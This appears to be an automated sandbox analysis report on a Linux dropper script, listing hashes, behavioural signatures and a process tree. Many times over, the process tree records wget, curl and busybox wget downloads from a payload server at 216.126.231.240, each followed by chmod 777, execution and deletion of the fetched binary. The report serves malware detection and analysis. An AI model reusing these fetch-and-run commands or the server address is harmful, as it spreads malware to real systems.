Analysis
-
max time kernel
26s -
max time network
117s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-11-2024 15:13
Static task
static1
Behavioral task
behavioral1
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
Resource
debian9-mipsel-20240729-en
General
-
Target
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N
-
Size
10KB
-
MD5
8024f690eb7cff058a13d1d38f0b31c0
-
SHA1
c4be3a2eb04473145808dd1ce797dce7815d06dc
-
SHA256
838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856
-
SHA512
9fa6258d021edb3a5423acb3c3d58dddad944e245b9f849a1f4ce16473b3976c29b7e07c4f171df4f4d8acd04988b6eba64c58a82ecf121b6c9756d10324ec9f
-
SSDEEP
192:+fEqq1c7X/8cm6S6m6W6D676ABfBga7X/8cI6S6m6W6D676wqqi:+fEqq1c7X/8c0BfBga7X/8cuqqi
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 1543 chmod 1639 chmod 1513 chmod 1525 chmod 1615 chmod 1567 chmod 1585 chmod 1621 chmod 1651 chmod 1507 chmod 1573 chmod 1633 chmod 1519 chmod 1609 chmod 1627 chmod 1531 chmod 1597 chmod 1561 chmod 1591 chmod 1663 chmod 1501 chmod 1555 chmod 1657 chmod 1537 chmod 1579 chmod 1645 chmod 1549 chmod 1603 chmod -
Executes dropped EXE 28 IoCs
Processes:
8ReStadMbCmEurUfQpyytOyHFmyODTgdGZpdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHKeFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEXLiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuoFQEOoM3X8lrwXw1WGkPq7AModrpioPpb3fF5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9HkgBUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5SlxAp23TLnMDOtEJaYDtSWAuowl8awe0aymJN62MA381JSNwxqMwQ7H88NQY12gs09PC5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvemwPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQQ2coityNz9jjImihquLcKzocOGf1iQj2twuAAzSaxso87KkFnZRciA1XNBvjhESxA4FXb2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuwwPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQQ2coityNz9jjImihquLcKzocOGf1iQj2twmJN62MA381JSNwxqMwQ7H88NQY12gs09PC5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvemuAAzSaxso87KkFnZRciA1XNBvjhESxA4FXb2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuweFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEXLiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo8ReStadMbCmEurUfQpyytOyHFmyODTgdGZpdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHKBUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ayFQEOoM3X8lrwXw1WGkPq7AModrpioPpb3fF5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkgioc pid process /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ 1502 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK 1508 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 1514 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo 1520 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f 1526 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg 1532 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 1538 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay 1544 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 1550 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 1556 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 1562 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 1568 Q2coityNz9jjImihquLcKzocOGf1iQj2tw /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 1574 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 1580 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ 1586 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw 1592 Q2coityNz9jjImihquLcKzocOGf1iQj2tw /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC 1598 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem 1604 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX 1610 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw 1616 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX 1622 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo 1628 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ 1634 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK 1640 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 1646 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay 1652 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f 1658 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg 1664 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 curl File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl File opened for modification /tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5 curl File opened for modification /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo curl File opened for modification /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay curl File opened for modification /tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw curl File opened for modification /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ curl File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl File opened for modification /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f curl File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl File opened for modification /tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ curl File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl File opened for modification /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK curl File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl File opened for modification /tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo curl File opened for modification /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg curl File opened for modification /tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw curl File opened for modification /tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX curl File opened for modification /tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK curl File opened for modification /tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f curl File opened for modification /tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg curl File opened for modification /tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC curl File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl File opened for modification /tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem curl File opened for modification /tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX curl File opened for modification /tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ curl File opened for modification /tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay curl
Processes
-
/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N/tmp/838371a13b589ee0fc2718a47f5fc344fba98088f2c9992ad8a37a666460d856N1⤵PID:1493
-
/bin/rm/bin/rm bins.sh2⤵PID:1494
-
/usr/bin/wgetwget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1495
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Writes file to tmp directory
PID:1499 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1500
-
/bin/chmodchmod 777 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- File and Directory Permissions Modification
PID:1501 -
/tmp/8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ./8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵
- Executes dropped EXE
PID:1502 -
/bin/rmrm 8ReStadMbCmEurUfQpyytOyHFmyODTgdGZ2⤵PID:1503
-
/usr/bin/wgetwget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1504
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Writes file to tmp directory
PID:1505 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1506
-
/bin/chmodchmod 777 pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- File and Directory Permissions Modification
PID:1507 -
/tmp/pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK./pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵
- Executes dropped EXE
PID:1508 -
/bin/rmrm pdKVkFOm7ztkd3MTtusCdcpXVtx5YFLCHK2⤵PID:1509
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1510
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Writes file to tmp directory
PID:1511 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1512
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:1513 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:1514 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1515
-
/usr/bin/wgetwget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1516
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Writes file to tmp directory
PID:1517 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1518
-
/bin/chmodchmod 777 LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- File and Directory Permissions Modification
PID:1519 -
/tmp/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo./LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵
- Executes dropped EXE
PID:1520 -
/bin/rmrm LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1521
-
/usr/bin/wgetwget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1522
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Writes file to tmp directory
PID:1523 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1524
-
/bin/chmodchmod 777 FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- File and Directory Permissions Modification
PID:1525 -
/tmp/FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f./FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵
- Executes dropped EXE
PID:1526 -
/bin/rmrm FQEOoM3X8lrwXw1WGkPq7AModrpioPpb3f2⤵PID:1527
-
/usr/bin/wgetwget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1528
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Writes file to tmp directory
PID:1529 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1530
-
/bin/chmodchmod 777 F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- File and Directory Permissions Modification
PID:1531 -
/tmp/F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg./F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵
- Executes dropped EXE
PID:1532 -
/bin/rmrm F5OKQ3rjsaKUhtVPlG2yRcyUCByTqq9Hkg2⤵PID:1533
-
/usr/bin/wgetwget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1534
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Writes file to tmp directory
PID:1535 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1536
-
/bin/chmodchmod 777 BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- File and Directory Permissions Modification
PID:1537 -
/tmp/BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl5./BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵
- Executes dropped EXE
PID:1538 -
/bin/rmrm BUPEOCJFPRTKQzeLmm94BCHijhgDL3bBl52⤵PID:1539
-
/usr/bin/wgetwget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1540
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Writes file to tmp directory
PID:1541 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1542
-
/bin/chmodchmod 777 SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- File and Directory Permissions Modification
PID:1543 -
/tmp/SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay./SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵
- Executes dropped EXE
PID:1544 -
/bin/rmrm SlxAp23TLnMDOtEJaYDtSWAuowl8awe0ay2⤵PID:1545
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1546
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Writes file to tmp directory
PID:1547 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1548
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:1549 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:1550 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1551
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1552
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Writes file to tmp directory
PID:1553 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1554
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:1555 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:1556 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1557
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1558
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Writes file to tmp directory
PID:1559 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1560
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:1561 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:1562 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1563
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1564
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Writes file to tmp directory
PID:1565 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1566
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:1567 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:1568 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1569
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1570
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Writes file to tmp directory
PID:1571 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1572
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:1573 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:1574 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1575
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1576
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Writes file to tmp directory
PID:1577 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1578
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:1579 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:1580 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1581
-
/usr/bin/wgetwget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1582
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Writes file to tmp directory
PID:1583 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1584
-
/bin/chmodchmod 777 wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- File and Directory Permissions Modification
PID:1585 -
/tmp/wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ./wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵
- Executes dropped EXE
PID:1586 -
/bin/rmrm wPF4J3ZU2Hm2OkerOfyz0RJVXJFGM6bgsQ2⤵PID:1587
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1588
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Writes file to tmp directory
PID:1589 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1590
-
/bin/chmodchmod 777 Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- File and Directory Permissions Modification
PID:1591 -
/tmp/Q2coityNz9jjImihquLcKzocOGf1iQj2tw./Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵
- Executes dropped EXE
PID:1592 -
/bin/rmrm Q2coityNz9jjImihquLcKzocOGf1iQj2tw2⤵PID:1593
-
/usr/bin/wgetwget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1594
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Writes file to tmp directory
PID:1595 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1596
-
/bin/chmodchmod 777 mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- File and Directory Permissions Modification
PID:1597 -
/tmp/mJN62MA381JSNwxqMwQ7H88NQY12gs09PC./mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵
- Executes dropped EXE
PID:1598 -
/bin/rmrm mJN62MA381JSNwxqMwQ7H88NQY12gs09PC2⤵PID:1599
-
/usr/bin/wgetwget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1600
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Writes file to tmp directory
PID:1601 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1602
-
/bin/chmodchmod 777 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- File and Directory Permissions Modification
PID:1603 -
/tmp/5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem./5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵
- Executes dropped EXE
PID:1604 -
/bin/rmrm 5CTTclHbVaJIl9nbSk6NJUdQNUkUhlgvem2⤵PID:1605
-
/usr/bin/wgetwget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1606
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Writes file to tmp directory
PID:1607 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1608
-
/bin/chmodchmod 777 uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- File and Directory Permissions Modification
PID:1609 -
/tmp/uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX./uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵
- Executes dropped EXE
PID:1610 -
/bin/rmrm uAAzSaxso87KkFnZRciA1XNBvjhESxA4FX2⤵PID:1611
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1612
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Writes file to tmp directory
PID:1613 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1614
-
/bin/chmodchmod 777 b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- File and Directory Permissions Modification
PID:1615 -
/tmp/b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw./b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵
- Executes dropped EXE
PID:1616 -
/bin/rmrm b2nDqMGiGXgmym7GpyNK40tpiHn8SRgeuw2⤵PID:1617
-
/usr/bin/wgetwget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1618
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Writes file to tmp directory
PID:1619 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1620
-
/bin/chmodchmod 777 eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- File and Directory Permissions Modification
PID:1621 -
/tmp/eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX./eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵
- Executes dropped EXE
PID:1622 -
/bin/rmrm eFhEuB2IQPROIGH3xR2y4KCjtxnY8UdeEX2⤵PID:1623
-
/usr/bin/wgetwget http://216.126.231.240/bins/LiawmxcPz55E9BGHImSZlcHkWDWJ8BjGuo2⤵PID:1624
-
